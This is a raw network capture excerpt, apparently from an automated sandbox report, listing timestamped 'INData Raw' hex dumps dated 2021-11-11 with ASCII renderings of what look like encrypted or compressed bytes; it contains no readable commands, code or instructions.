                                                                                                                                                                                2021-11-11 11:26:04 UTC43INData Raw: 91 69 dd 95 ee df 71 f4 a3 cf 4a 62 b8 da 32 57 67 d5 b3 a3 c9 cc 58 7e 84 3f f0 8d a7 8c 3b 94 57 fd dd 84 fb 26 ce cb 17 3c 42 a1 9c e6 fd 41 89 ef c7 93 79 40 2d cf e7 32 1e 4a 44 99 4a fb f0 df 47 f4 d3 c6 79 3d e9 5c 3d 71 cc e6 5f 94 48 b4 79 f6 a8 6a 73 4f e5 78 0f 2e 33 59 6d 59 7f 79 bc 51 76 15 15 71 59 e5 92 bb 08 07 61 8a 59 6e 81 3a 06 7a f2 2e e3 50 32 f5 f7 93 ff 7f 2c b8 23 74 46 4e 14 ec 88 0b c4 38 c8 36 03 28 25 88 b9 34 76 67 b1 f8 25 25 d8 9c ab 6a 37 f3 8f 6f e8 4c da b1 ad 43 2a f3 c7 2e db 7d 54 3d 0c d0 49 d6 e0 ef ee 0c 33 ea 6d 65 34 c5 99 8e d6 f5 eb 29 97 b2 b0 a2 d8 34 b7 90 21 6f 38 4c 6f 40 d5 9e 15 fa 25 1a cc af c2 90 42 65 06 f8 07 e0 73 95 5c 78 8e a7 7f 43 bd 4d 17 0d 46 92 d3 f8 1b 0e 00 d1 13 45 ab 78 5d b7 d6 50 e6
                                                                                                                                                                                Data Ascii: iqJb2WgX~?;W&<BAy@-2JDJGy=\=q_HyjsOx.3YmYyQvqYaYn:z.P2,#tFN86(%4vg%%j7oLC*.}T=I3me4)4!o8Lo@%Bes\xCMFEx]P
                                                                                                                                                                                2021-11-11 11:26:04 UTC44INData Raw: 65 d7 55 96 40 4c 34 e2 41 b3 03 a8 1b 08 33 78 bf 45 bb 83 c7 54 a3 d8 5c 27 8a 72 5c b1 86 8c a7 dc 95 1d a3 b0 2b b0 48 9a f1 0c 81 a7 82 31 94 04 64 a2 68 70 b5 3c 83 01 c9 c1 a6 91 2b 31 f1 d8 d3 d3 ac 2c 96 44 59 d5 95 d6 cb d2 8e a5 09 55 fc af 32 6b 13 e0 33 64 e8 5b 6c 29 32 77 73 ac 91 c0 3e 99 4d 9e 79 13 93 e0 0b 11 ee fc af f8 ec 10 88 31 24 d2 d6 61 67 d9 3c e7 86 3c 07 14 2d a3 d2 b2 4c 06 5f 09 c9 5f 9e 94 b4 22 5c c2 84 55 60 14 8d 4e d2 ad e8 06 ef 05 72 f5 9f 81 a0 26 6a 6c d1 e0 d5 2b 38 ee 9f b0 9b 06 da ad 44 ea 8b f7 3c a8 93 dc 6d 22 ed 90 2b 25 6c 88 ec 72 de 64 9f 59 2a 7c 98 52 7f 02 28 56 28 ac a3 e1 6c a2 6f 01 57 ab 97 12 30 c2 cf 99 70 7e c5 80 87 09 38 b0 c5 69 3f 1e 08 4a e8 fb ce 45 34 b0 19 a1 a6 85 c0 6f ab 30 18 34 af
                                                                                                                                                                                Data Ascii: eU@L4A3xET\'r\+H1dhp<+1,DYU2k3d[l)2ws>My1$ag<<-L__"\U`Nr&jl+8D<m"+%lrdY*|R(V(loW0p~8i?JE4o04
                                                                                                                                                                                2021-11-11 11:26:04 UTC45INData Raw: e4 88 52 7b 94 d3 a1 3b 25 f0 60 fa e5 b7 5f 5b 82 73 57 64 ee dc 9b ac 23 06 cd 93 0f d2 99 55 de ee 00 72 ff a2 66 88 ed e0 8e f6 ba 73 96 12 58 50 a0 ec 79 1f c2 90 fe 52 95 1f 9a 9d b8 17 46 5d 51 41 0f 26 b7 84 94 b6 62 b2 5d bd b1 00 61 40 91 ce 3d 38 d9 57 e8 74 de 17 54 89 ee 03 bc ef 6f 4e b5 bd d2 c7 6a 40 49 e1 59 72 ca 70 5f eb 72 3b 97 9f 40 59 4a e0 05 33 ac a0 5e 60 5f 10 97 94 35 43 5b c9 28 42 6d 6e 43 71 a6 a0 6c f9 c4 67 72 b7 d7 77 39 7f d2 22 4c 98 62 8f f1 a2 f5 84 1b 1d 31 d3 47 0d d6 fb 23 e9 dc 96 c1 cb d8 cc a8 61 8b 3f 5e 67 1a 28 de 15 b8 8a 40 b8 bf 63 d8 d8 bf a9 9c 1f 47 45 71 ac 4c 7f 9e 11 a8 99 4f f7 0d c0 14 f9 c9 d5 4f 3b 4f 3c 97 cb 6d 97 9d 1a 32 6c 59 f8 93 92 a5 34 23 f6 b9 c6 9f e9 94 6a d8 43 be a5 04 56 69 f1 ab
                                                                                                                                                                                Data Ascii: R{;%`_[sWd#UrfsXPyRF]QA&b]a@=8WtToNj@IYrp_r;@YJ3^`_5C[(BmnCqlgrw9"Lb1G#a?^g(@cGEqLOO;O<m2lY4#jCVi
                                                                                                                                                                                2021-11-11 11:26:04 UTC47INData Raw: be 0a a9 69 94 20 55 29 bf 78 b0 c4 64 2f a7 f6 b0 c8 78 fd cc 40 6d 6b 26 ca 19 7f 4e b2 6d a9 0d de e8 71 4b a5 d2 b4 d5 db 64 c5 7e 9b 68 c7 2d ca 82 2b 9a a5 63 e4 e9 b3 83 0a 9d 7e 93 c6 72 b7 79 87 e8 78 9c 28 8e 6d e1 e6 9d 14 cf 0d 80 f0 0f 48 c7 c3 41 d4 ef 92 c7 4b 15 09 cc 43 b8 1a a9 91 39 76 7d 68 5e aa 17 73 e9 05 e7 e9 f9 63 b3 a2 9b 52 93 09 21 59 bb 85 4a 48 2e a3 c8 a7 4d 8c ff 20 c9 2b f2 c0 ea 87 be f2 73 3c c1 65 1e 5e b8 ef e7 4d 3e fc de af 30 ec af fc b7 61 de b4 38 43 63 28 e2 57 7c 17 5d f5 b4 aa b2 fa 0f f9 c2 8e 62 6e 30 e0 54 0a eb c5 73 a0 7b 89 62 59 82 b2 c0 af c0 6e 0b 9c 8b 3a 0d f1 d6 1d 48 fa be 25 45 0e 29 33 e0 70 50 df 6a 76 8b b5 ff 0f 30 7e 46 dc 85 30 86 4d cc 98 7b 98 b0 45 fc ca eb d8 f3 82 8f 29 64 8d 24 e5 cb
                                                                                                                                                                                Data Ascii: i U)xd/x@mk&NmqKd~h-+c~ryx(mHAKC9v}h^scR!YJH.M +s<e^M>0a8Cc(W|]bn0Ts{bYn:H%E)3pPjv0~F0M{E)d$
                                                                                                                                                                                2021-11-11 11:26:04 UTC48INData Raw: 8b 1c 6f ec d4 e2 db dd a2 26 7a af 50 31 8b 1d eb bd c7 fa 2a 05 10 c6 15 e3 47 51 ea ee 66 d0 b5 7a 08 3e 8c c6 40 90 18 40 41 59 f7 a4 55 15 19 e7 7f 95 d6 57 79 03 6c 34 5e c7 e1 43 42 b3 e5 3d 5d b3 ca bd 59 0c 08 ae 63 fc 03 6e ea a8 22 5e 95 7a 07 a0 1d 69 1e b1 98 bb ad a6 66 42 8e ae 8f 9e 5a 36 e5 bd 8d b4 ad c5 ab eb aa c8 a6 ad 59 b2 a1 c0 b2 31 e2 81 64 df 05 27 1f b1 c5 af 06 a1 0a 52 48 22 fb 53 95 f1 90 a8 33 1e a0 92 af fb dc 97 77 de c5 b4 89 6b 11 2a 5a b2 9a 63 a0 50 8c 47 8d e9 d2 74 91 c6 d2 a3 86 b5 ab de 4a df d5 b9 d4 84 c5 b3 a7 6b 60 a8 b8 9f 31 b2 5c ab bf 8d 44 f1 a3 c7 73 a5 7b 50 c4 8e 1a 39 5b a5 97 03 0b ab a3 35 3b 19 ba 44 4d be a9 cd 9d f0 8d 30 97 b2 05 af a9 db 5d 0b 67 fb 26 a9 5d ca a6 34 f1 6d fe 49 6f 1b 89 b2 af
                                                                                                                                                                                Data Ascii: o&zP1*GQfz>@@AYUWyl4^CB=]Ycn"^zifBZ6Y1d'RH"S3wk*ZcPGtJk`1\Ds{P9[5;DM0]g&]4mIo
                                                                                                                                                                                2021-11-11 11:26:04 UTC49INData Raw: 5a a0 ab d3 c9 8d 39 58 ee e5 1a 2b fe 74 b5 3f 2c 0a 36 f2 cf 91 9b 1a 92 99 91 c4 e3 00 a5 94 1c 8d c4 ca 6f 1c 97 09 3c a0 a5 ab fd f3 af c1 6c 97 ec 18 36 b2 b7 76 38 1e c7 b5 c4 42 13 c6 01 00 30 3f ea 8f a1 78 d7 88 31 7f 3b f8 ef 92 60 03 88 76 de fe cd df 9e b4 b7 fb 32 33 de 3b fc f1 55 7e 3e c3 1a 0b c0 79 c6 e4 2a 93 cc b0 4c 78 15 03 cc 07 4f e7 7d 48 69 a6 a6 8a da 68 71 14 c8 1f 60 48 3d ad d9 e5 7d f5 4a aa 6e 7e b2 8a aa cc de ba b2 b8 02 80 e9 75 40 5b da 04 d8 89 38 2d 65 4f c5 55 6b 2d b0 19 b1 4d ed 4c 5b ba 70 f0 e7 e7 3e 7c 40 84 b0 11 66 46 56 05 80 a4 bc 7b 95 76 db e4 75 19 b8 59 6e 18 27 1e 5e dc 99 32 f6 4f ed 7e 02 3e ca 05 27 8a 65 9e 9a ee 49 71 65 84 f4 4c f2 4b f1 12 d2 10 ae 2f a5 3b 26 bd e1 93 93 1c 1d 9d b3 c4 8a 2b 2e
                                                                                                                                                                                Data Ascii: Z9X+t?,6o<l6v8B0?x1;`v23;U~>y*LxO}Hihq`H=}Jn~u@[8-eOUk-ML[p>|@fFV{vuYn'^2O~>'eIqeLK/;&+.
                                                                                                                                                                                2021-11-11 11:26:04 UTC51INData Raw: c4 50 ea 53 a7 51 b9 2e 24 06 a7 69 8a 64 98 1d 9f 16 df 4d 09 a2 9f 56 70 8c 1b 99 45 89 be c7 fe 0a 33 fc ee 15 17 2f 73 f4 29 f2 21 26 05 96 4a b0 37 e6 47 56 22 33 2d b7 82 f9 21 1b 35 31 a0 ec 7b e2 7e e3 78 7d 88 51 9b 8e d6 3e c3 d7 b3 c2 2e 2d ea e2 82 e3 ed cb de 34 f3 88 ab 24 e4 98 e1 24 9c 94 49 53 00 e5 79 6f 50 83 68 6b 80 7d 21 14 ff 75 1d 26 71 83 f5 d8 cb 9c 30 bc 29 32 38 10 43 fb ec a0 be fc f8 cb 6a e1 d2 92 0d e5 c8 c3 c4 df 25 1c 48 6f 3d d1 2b 9d fc 0f 3e b3 19 7c b3 33 83 8d 66 79 c8 00 6e 1a 98 1f b2 16 12 46 f9 9a 9a 43 41 d5 db ad 2d a2 92 4f 29 98 61 26 40 cd 2f aa 6b fe a6 ce d9 ac 3e 26 dc 1c d7 6a a5 b3 7a 6e 72 8c f7 23 04 d9 f3 02 36 64 9a 8b fb fc 20 81 3d ee 6b 60 ab 32 e7 07 f1 21 36 1e ad ce 12 ec ef 47 13 93 24 2b 37
                                                                                                                                                                                Data Ascii: PSQ.$idMVpE3/s)!&J7GV"3-!51{~x}Q>.-4$$ISyoPhk}!u&q0)28Cj%Ho=+>|3fynFCA-O)a&@/k>&jznr#6d =k`2!6G$+7
                                                                                                                                                                                2021-11-11 11:26:04 UTC52INData Raw: d5 00 46 07 a9 ac eb 49 50 38 45 76 f5 a7 88 6c 74 a8 77 48 81 d8 d9 40 4f 21 42 25 a7 a2 b2 08 eb a5 f4 83 bf 99 9a 11 da 86 89 f1 8a a5 26 46 ad ef d6 06 4d af fb 20 6b 6f 71 23 05 48 6e 3a 40 e6 b0 91 f0 fd c8 f2 c3 94 d4 b5 18 28 ce de 56 f8 95 be c2 c4 6c 52 fd d6 a0 43 13 c6 6f 2a da bb cd d5 9e 27 06 14 ad a9 4c ed 2f ab e0 7a 56 60 69 cc 50 ce 2f f2 ee 44 91 cd 97 50 06 8e be cd 6b 9a 88 f4 1c 16 85 d4 d1 55 bf d8 35 6b 32 ea 1e 91 73 18 0f 28 13 b8 3e be bf f2 26 28 b2 26 c7 0c 30 b9 27 13 8c e4 38 0a 73 0f 3f 48 df 42 61 a3 75 21 79 81 31 6f b1 f9 85 67 18 e9 38 ce 19 45 fd c1 07 b7 ae e0 70 91 f9 78 90 d4 b3 7b 46 93 9d 5c f5 9e 5a 44 6a 39 60 67 61 13 87 f7 de e0 78 d1 5b 49 3b 30 d2 2a 14 f4 7c e2 e6 8b 16 42 cb cd e9 cc cc 13 0c 1b 40 55 1d
                                                                                                                                                                                Data Ascii: FIP8EvltwH@O!B%&FM koq#Hn:@(VlRCo*'L/zV`iP/DPkU5k2s(>&(&0'8s?HBau!y1og8Epx{F\ZDj9`gax[I;0*|B@U
                                                                                                                                                                                2021-11-11 11:26:04 UTC53INData Raw: 84 73 8d 93 d2 d0 56 36 8c 2c a8 13 dc 7b c6 0f c8 a3 f0 53 40 fa 19 7d 7e 48 54 aa 4d d7 9b 30 ca 6e ea 33 d9 51 06 13 b6 ae e4 b5 a2 7a 43 30 07 4c c5 f3 2d 95 be 99 9f 3b 61 1a f6 5a 46 93 75 cf df 9c 90 c5 03 0c 9d 6c ac 30 aa e3 b5 b8 7b 38 a7 a0 d0 9c ee ac 24 1d 4d a7 22 15 85 4c 7a bf 89 1b 4f b5 21 9f 4b 18 af 92 7b c8 cd ad c1 d7 5d 7d 9d 51 e5 c7 8d af 41 c8 d0 64 34 d4 0f ec 48 94 7b b8 d5 3b 3a bd fc b0 c0 59 b8 e3 d1 12 d7 17 85 00 ae f4 3f 88 d9 ac aa ae 1f 91 cf 52 1c 7e 77 6d 14 77 49 e4 fe ef 2d 02 43 0e de 37 8d 6d 43 d0 5f de 83 bb 45 b0 17 9f 83 ef 37 28 b3 91 23 01 ab 0c c9 cf 36 51 b9 88 e2 80 08 90 85 ee 7a 54 6e 24 9f 66 6a 62 b6 1b 7d eb 57 66 ac 85 fe 32 e6 11 98 b2 3e 7e d9 1d 3d 9b 6c 13 de 7b a6 68 17 97 9d dd 34 89 a4 96 32
                                                                                                                                                                                Data Ascii: sV6,{S@}~HTM0n3QzC0L-;aZFul0{8$M"LzO!K{]}QAd4H{;:Y?R~wmwI-C7mC_E7(#6QzTn$fjb}Wf2>~=l{h42
                                                                                                                                                                                2021-11-11 11:26:04 UTC57INData Raw: 2f 39 ae 79 51 db f6 a7 60 54 7c 05 e6 33 dd 88 25 18 22 75 5e 40 5d 93 89 97 5a 45 13 22 ef 92 82 3c 5a 1e ec 1f 9f 5e 4e fc 6c e8 bb fe 7c 2d c3 19 9e 94 ac 49 42 fd 90 a8 20 81 33 51 dd 8d 80 74 0e 68 27 fd f4 30 90 df 44 ef cd 5c 2a e8 1e c2 62 12 66 6d 58 ef cc 5e 7b a2 c7 8a 01 d0 c0 f8 04 ee cc 86 b1 77 34 3b a8 80 ae f8 ef 7c 68 cd 04 e8 c4 e8 44 11 0b 1a 58 54 71 61 f4 09 06 8a 7b 4f 6f 00 47 fb 7e 1e 8d 75 f6 17 d3 3c b1 34 10 70 20 04 b8 93 b6 b4 ca ce 02 3d b8 54 a7 af 80 6b e9 01 30 76 63 f1 33 7a fa 17 2c 04 60 0c ae 52 59 f3 86 0d 39 f6 4e 9d b7 41 9a 84 fa e2 db 99 ad 74 21 f2 69 0c 45 c5 4e 95 d3 76 b7 03 04 b1 7c d8 ad 78 03 94 ee 94 62 8e db fb ae 47 a8 b1 cd ee 92 b7 4c c2 49 ec 88 39 b5 b8 c0 81 9c e2 64 9c 48 49 8b 16 02 b1 a0 a3 e7
                                                                                                                                                                                Data Ascii: /9yQ`T|3%"u^@]ZE"<Z^Nl|-IB 3Qth'0D\*bfmX^{w4;|hDXTqa{OoG~u<4p =Tk0vc3z,`RY9NAt!iENv|xbGLI9dHI
                                                                                                                                                                                2021-11-11 11:26:04 UTC61INData Raw: 26 b4 99 fa 70 cd a3 9b bb f6 9e fb 28 90 c4 03 0d fa 1c d1 3d 4a 23 0b 5b c8 d0 e9 80 1a d4 0f eb 0e 00 7e e9 8b 59 60 96 b4 27 c9 09 27 25 c6 c3 c9 85 e7 5b cb 82 66 e5 d3 d2 91 a3 a6 1b 20 4e 19 d4 71 6a da b1 d1 1c f6 1d 15 62 c3 62 ba c4 28 64 01 69 0b cf 0d bc dc 9b c8 e2 b2 38 78 41 c2 25 18 21 91 1d bc 49 f5 63 e3 ab 30 e3 3b 44 ad c3 d6 77 38 7b bc 37 7d 7d d9 10 98 c3 11 c2 0f 86 12 2f f6 10 dd 52 5b 45 45 aa 38 fd e3 6c b2 c9 a6 ef 8d ea 8e a8 9e 35 6a 61 50 e9 d2 0d 22 27 2f 5b 98 97 a5 a8 cc 92 17 af ee 2d 0f 2b 6b 70 87 bd fd 2b f1 03 a5 79 67 c6 63 90 93 34 f9 b3 99 04 9f 98 00 85 31 c3 af 28 2e 44 9d bf 9f cd 54 c1 9b 7f 1f 65 f0 2c 77 8c 04 86 1f 32 d5 5d 02 14 6d fb f4 96 e7 91 61 f0 36 c5 9f 38 30 b7 f3 69 b7 d0 85 a6 c7 00 fd f7 31 90
                                                                                                                                                                                Data Ascii: &p(=J#[~Y`''%[f Nqjbb(di8xA%!Ic0;Dw8{7}}/R[EE8l5jaP"'/[-+kp+ygc41(.DTe,w2]ma680i1
                                                                                                                                                                                2021-11-11 11:26:04 UTC66INData Raw: a2 83 62 1c 7b a7 59 76 6c 31 65 48 ba 60 ab 2b 7e c5 df 9d 79 ff 63 21 bb 7b 50 6e a6 70 db 13 c5 a3 a3 af 41 6e 40 a9 9c 72 fd 21 bd 18 a1 4e 3f a7 ca cb bc ee 0b 71 e6 74 73 ad 4e 7f e0 cc 45 50 d8 4b 8a a3 c4 eb 98 50 c7 94 53 df 35 28 8c 04 cf cf bf bc 79 e3 85 88 64 36 1a f8 ff 5c c6 a1 0e 33 0d 90 71 48 89 a6 8b 7b ae fc 02 78 59 a7 84 55 86 9c 7b e2 bf cf 99 bb d6 9c 5f 45 51 be 36 6c 50 8e 03 2b 98 bf 0c 41 d9 64 02 71 85 8b ff e4 c4 ca 2a 55 fe 2a d8 b7 b0 50 ae a3 51 f3 14 c0 b4 cf df 71 4e 89 01 cc 44 d3 22 d6 da 18 9d 80 a6 96 68 b7 c0 58 22 33 f4 6a 8c b8 c1 26 45 9c ae 74 67 3b 82 cb bf 9b 49 21 d9 55 95 f0 33 80 b1 a7 37 39 71 77 77 85 dd 25 80 46 2e 95 79 28 61 20 1c 50 75 07 63 50 93 6d 50 95 68 da 82 33 f3 74 11 01 a7 28 a7 d5 32 59 5d
                                                                                                                                                                                Data Ascii: b{Yvl1eH`+~yc!{PnpAn@r!N?qtsNEPKPS5(yd6\3qH{xYU{_EQ6lP+Adq*U*PQqND"hX"3j&Etg;I!U379qww%F.y(a PucPmPh3t(2Y]
                                                                                                                                                                                2021-11-11 11:26:04 UTC68INData Raw: a9 60 3c fb 71 9e 42 7a 02 5b 66 45 69 1a c8 41 c5 b9 0a a1 99 88 32 bb 13 e1 fd 9f ed 85 a8 2f cd d1 3b 98 22 d6 17 98 33 81 0b f5 69 e2 cc a9 5a 77 ef b8 70 27 a2 be eb 61 1f c9 65 5e f4 d5 b6 66 aa 76 99 93 90 f5 82 96 9e d9 fa ce 67 3e c9 38 bb 73 71 5c d5 74 cd 37 e2 e6 f1 6e a0 40 e7 7c 6d 5f da d2 4b 8b 2d f6 99 d1 fc c9 56 73 c2 50 65 57 a9 f4 7c b9 7a aa d7 9a 78 2b a7 48 8a f3 a4 e6 af bd a1 84 e7 46 ce ac 29 5e 55 1b a9 4e c7 a5 30 6b fe 22 46 36 f0 6d cd d7 c6 eb ac 45 d3 60 be fe ea e4 19 6b 7c a0 c8 aa a5 86 76 2b b9 bb 03 9e 4a b5 7a 8d 79 42 f5 c4 ce 83 f4 b0 d1 ae 60 da e7 c5 bf c2 de f1 a9 8c e3 f3 ed e6 fa 8b c7 20 55 e2 6b c1 68 00 d7 4d d0 a9 09 41 8a 08 e7 46 dc aa e3 6b b8 c1 7f 2a 4e 11 34 6f 60 4c c2 cf a1 f5 53 78 5a 0e 5a 81 f3
                                                                                                                                                                                Data Ascii: `<qBz[fEiA2/;"3iZwp'ae^fvg>8sq\t7n@|m_K-VsPeW|zx+HF)^UN0k"F6mE`k|v+JzyB` UkhMAFk*N4o`LSxZZ
                                                                                                                                                                                2021-11-11 11:26:04 UTC72INData Raw: 8d 9a b6 e1 a6 36 06 91 9a b2 61 bf 31 f4 70 50 6c b2 3b f4 02 69 d4 78 ba 6b 4b ab f5 29 bf 83 61 b1 5c db 72 49 e5 f1 d7 b9 99 c4 a0 c6 09 b7 f5 dc 01 f5 88 02 bf 4a f7 11 48 b4 fe a7 69 aa 07 77 41 37 c8 9b 50 83 03 33 47 c2 a3 c9 2c bd da c0 ba 92 ec 3e 5f 7d 4e 3e 88 bb e1 48 b2 ca 9c 73 eb cd a5 a4 4a f4 7e 98 c0 fa 80 20 81 64 29 ab 33 5a 86 63 1a b7 58 b3 9f 72 37 91 ad bc 7b 3d 52 08 98 2f bf 38 4b c8 af c9 4b 54 bc af 8f f6 a0 f8 c3 24 ce 3d 12 3d 2a 90 69 be 65 48 9c 44 54 27 e1 c4 a0 b1 f4 2e 42 70 a6 2c 6a 98 c0 12 b8 71 96 26 97 4d 7f 63 b2 7c 2a db 37 f2 50 5f 56 50 e9 c5 d1 e8 b3 16 8d 61 56 fb 51 ae bb 3e 69 fb d9 42 6a e0 01 02 f5 7b f8 e3 4d a8 f7 38 87 86 db 75 1a 35 c3 52 07 9d 9d ef 6b 83 2e a1 45 99 e7 52 34 c2 7b a9 c2 7b 46 66 06
                                                                                                                                                                                Data Ascii: 6a1pPl;ixkK)a\rIJHiwA7P3G,>_}N>HsJ~ d)3ZcXr7{=R/8KKT$==*ieHDT'.Bp,jq&Mc|*7P_VPaVQ>iBj{M8u5Rk.ER4{{Ff
                                                                                                                                                                                2021-11-11 11:26:04 UTC76INData Raw: 43 5b a5 41 1f fa 94 49 62 89 29 20 ce b5 07 66 76 19 f5 90 04 5d 07 99 94 58 fa aa f1 9e 3e 57 9b 86 a8 42 a1 e9 34 94 df a5 94 59 9a 40 dd ba 98 62 02 a8 2c a8 14 b8 22 ed f6 31 cf 79 ad 5a 17 a9 5a b5 20 b8 16 8d 04 fe 87 47 02 f0 09 8e 94 98 f2 b0 22 bd 11 ec 02 41 8f 94 2a 59 54 66 e0 b1 b9 4f 25 55 a2 aa c8 9f 5e 75 95 06 3a d9 3d c3 15 b0 00 f5 b5 0a 2e b7 0a 2b 03 49 94 ab 9d 87 09 91 34 17 59 61 2b 57 d3 87 e4 f0 9d 4c 96 63 a8 41 33 a4 3d 63 9d 84 8f a9 96 5b 92 6e 0d eb 17 51 25 8d 13 6d eb f0 8b b0 b2 a8 6a 86 72 ba 1e 37 a2 0c 52 c5 2b 9b ad 57 f2 52 e5 bd 72 2c 5d 8b 80 b1 fb eb 56 bd 9f 45 aa bc f5 4a b4 86 9b 42 d7 5a 67 24 00 5f cf 85 7b 30 8e 6f 62 3f 76 27 11 f6 97 a7 e7 4d 5c 54 ab ee 59 41 99 8e 4f 56 5a 14 cd eb 6b ac ed 4d f6 f8 23
                                                                                                                                                                                Data Ascii: C[AIb) fv]X>WB4Y@b,"1yZZ G"A*YTfO%U^u:=.+I4Ya+WLcA3=c[nQ%mjr7R+WRr,]VEJBZg$_{0ob?v'M\TYAOVZkM#
                                                                                                                                                                                2021-11-11 11:26:04 UTC80INData Raw: a7 ae 4e 43 ba a4 7d 47 94 7b 7c cb 73 7f 16 f3 22 76 63 35 b4 b5 7d fc 29 f6 16 09 72 4c 1d f3 93 19 b0 7c 1d 11 77 ff 83 ba d0 c9 d2 9a 1f e7 94 73 68 d3 a3 a2 2e af 97 0a 61 d7 1c 9a 1b f1 4a 6a 7d 4a a6 19 30 42 bb 1c 94 f9 ac 6a 85 9e 93 50 2a d2 49 78 83 e8 2b 4f ae 28 2c be 88 fd 59 9e c1 66 9e 1a a2 42 ab 55 8c b8 bb 22 d3 f4 84 b2 3e c8 59 cc 68 03 97 41 8d 4c a5 9e ce ff 8b 1a 65 c4 ed 82 7e 36 95 06 ea c9 4d 47 74 c0 55 1a 75 e3 f3 f0 9f d2 61 3b fc f5 f7 32 50 f4 af 32 41 37 a5 12 6c f9 c9 f2 f2 f7 44 8e 4d 5b 7a f7 7b 3f 19 6c 42 47 41 18 fc 5e 79 af ca d7 ed 3f 92 68 5a c6 8f 1c 6a 7a fa 0f e2 ef b2 04 ce 38 04 27 68 76 37 ba 5d 18 f7 c7 41 cb 2a d3 6b c8 81 c8 a5 97 32 fb 5b e7 61 ef 39 b7 4d 39 10 1a 50 c3 b8 8f 25 29 20 7a 28 4c e2 86 b3
                                                                                                                                                                                Data Ascii: NC}G{|s"vc5})rL|wsh.aJj}J0BjP*Ix+O(,YfBU">YhALe~6MGtUua;2P2A7lDM[z{?lBGA^y?hZjz8'hv7]A*k2[a9M9P%) z(L
                                                                                                                                                                                2021-11-11 11:26:04 UTC84INData Raw: 66 03 40 9d 75 06 2e 2a bf 89 0c 77 9a 51 44 72 f9 a5 b5 04 02 4a d3 19 5d 08 09 d0 b1 d0 04 72 d2 34 b7 5d ff 7b cd 2f f2 a5 5d e6 ae 64 2c d1 c9 56 0b 41 d6 a9 34 f1 05 57 b7 7d 57 46 6a 41 8c 41 c3 b2 3e 05 b6 6a de b4 d8 95 62 b7 35 c8 8a df 4b 44 e3 7c 25 f0 3e 96 72 e0 ab 05 bb fd 61 b6 39 36 c1 96 6c a5 cd 56 8d 79 30 c0 27 d5 4e 50 b9 7b 71 e3 08 bc 3e a0 03 d1 ff c7 3e 31 36 04 39 b7 34 bc de a7 1c ac 2c 67 1b 9f 04 41 7c 6e d6 65 1e ad ce b4 30 6c fd a7 48 ac 2c 63 43 9c 00 85 60 a1 2c 89 1e a9 8a 5d 0c 34 d3 6c 9d 9b 06 5c ec 85 3c 3e 66 b5 7d 45 35 23 47 65 08 d2 0a 6b 3b a5 04 2d 06 a5 37 41 3f be c9 0a 37 f5 f2 7a 05 54 0a 54 b6 d2 01 2d 9e a2 33 35 3f ba 79 7a 01 d6 1a 60 ce aa 0a 04 02 64 26 51 23 94 26 dc 38 6b 63 62 e8 b5 74 da 14 04 85
                                                                                                                                                                                Data Ascii: f@u.*wQDrJ]r4]{/]d,VA4W}WFjAA>jb5KD|%>ra96lVy0'NP{q>>1694,gA|ne0lH,cC`,]4l\<>f}E5#Gek;-7A?7zTT-35?yz`d&Q#&8kcbt
                                                                                                                                                                                2021-11-11 11:26:04 UTC88INData Raw: b0 41 b7 0a 66 5b 1d cf 8a 70 13 06 81 73 7a 6b b4 c6 64 ae b0 2c 5a 3a 92 d4 9b a9 f1 dc ad f0 85 ec c5 ad d9 a3 c2 16 94 db 68 58 44 22 fc 3f be c2 4b 7d 18 02 4c 02 64 e5 b5 5c c7 68 89 0e 80 67 49 7e ac d0 51 6a 2d 08 6b 7a 66 3a 9c 48 84 b5 68 ba 49 57 61 b6 00 10 a3 7e 8d 1c 5f 02 b5 35 70 8f 7d 83 e1 da 39 8f c9 bb c1 6e 89 58 98 44 b2 c6 84 2b 28 a7 93 c0 f5 3c 0f 37 84 c6 b2 3c 27 fa 79 d3 14 29 7b 2b 5d f2 c3 ab 7a 5f ab 58 da 36 64 10 d8 31 9c d4 61 c4 85 ab 4a 1f af de ea e7 a2 04 b9 1e 7a 2b 5b ce c3 41 58 7d ac 63 59 2f f1 2c 6d 46 97 14 69 75 6a 6a a4 73 87 88 6f 4b 26 3a cb 4a dc 59 a2 41 84 54 37 55 78 d3 33 70 64 17 40 12 45 2b 2c e6 4f b8 fd 2e fc e3 ec 0f 10 1a f8 57 46 cb e6 20 48 91 5d 0f b0 9f 75 5b 6f 9f 1b e0 67 c4 39 fa e2 8d 1c
                                                                                                                                                                                Data Ascii: Af[pszkd,Z:hXD"?K}Ld\hgI~Qj-kzf:HhIWa~_5p}9nXD+(<7<'y){+]z_X6d1aJz+[AX}cY/,mFiujjsoK&:JYAT7Ux3pd@E+,O.WF H]u[og9
                                                                                                                                                                                2021-11-11 11:26:04 UTC93INData Raw: 6f f3 4b 8f 6f 34 fc ba 65 c0 a8 69 06 0e 07 0a 4d 61 cb b8 2b 1b ea c1 d2 98 6d 49 26 20 8f 8e c9 5e b8 3b 97 fc 31 ff 60 16 76 ca 7d 19 11 c1 7f 42 37 ef 61 42 27 04 ba 42 42 da f0 74 10 4a ec 35 af 4c 7a f3 f4 d1 89 9f be b8 2d 90 a0 ab 07 14 c3 73 e2 df 98 e6 78 d3 f3 1e 89 eb 09 17 f8 bd 16 2b 57 2a fc a9 9f 1c 3c 65 ff 21 8b 67 3f f4 34 c9 e3 80 3a cb 92 b8 55 76 e0 23 18 7c 48 cf 5e cc bf 02 c4 2d 80 2b 45 9d 60 6c 42 5a 72 85 c3 4a 59 da 3f 09 15 26 c5 b0 b5 95 21 1e 3e ac b9 24 2b e4 a8 d7 7a 65 da 92 d7 69 46 27 bc 4d d1 e1 0d 4d b9 0e 77 70 ae 79 a9 3b f6 06 12 e4 70 6c 85 54 42 db 60 ae 42 75 79 cc 06 c9 b6 3e 59 cb dc 3c b6 ee ff 28 3e c9 09 18 ad b6 84 2a 2c da e2 73 2a 80 e7 73 4f a9 d0 86 74 63 fa a5 98 99 95 0e 34 dd 78 a1 cb 53 32 81 31
                                                                                                                                                                                Data Ascii: oKo4eiMa+mI& ^;1`v}B7aB'BBtJ5Lz-sx+W*<e!g?4:Uv#|H^-+E`lBZrJY?&!>$+zeiF'MMwpy;plTB`Buy>Y<(>*,s*sOtc4xS21
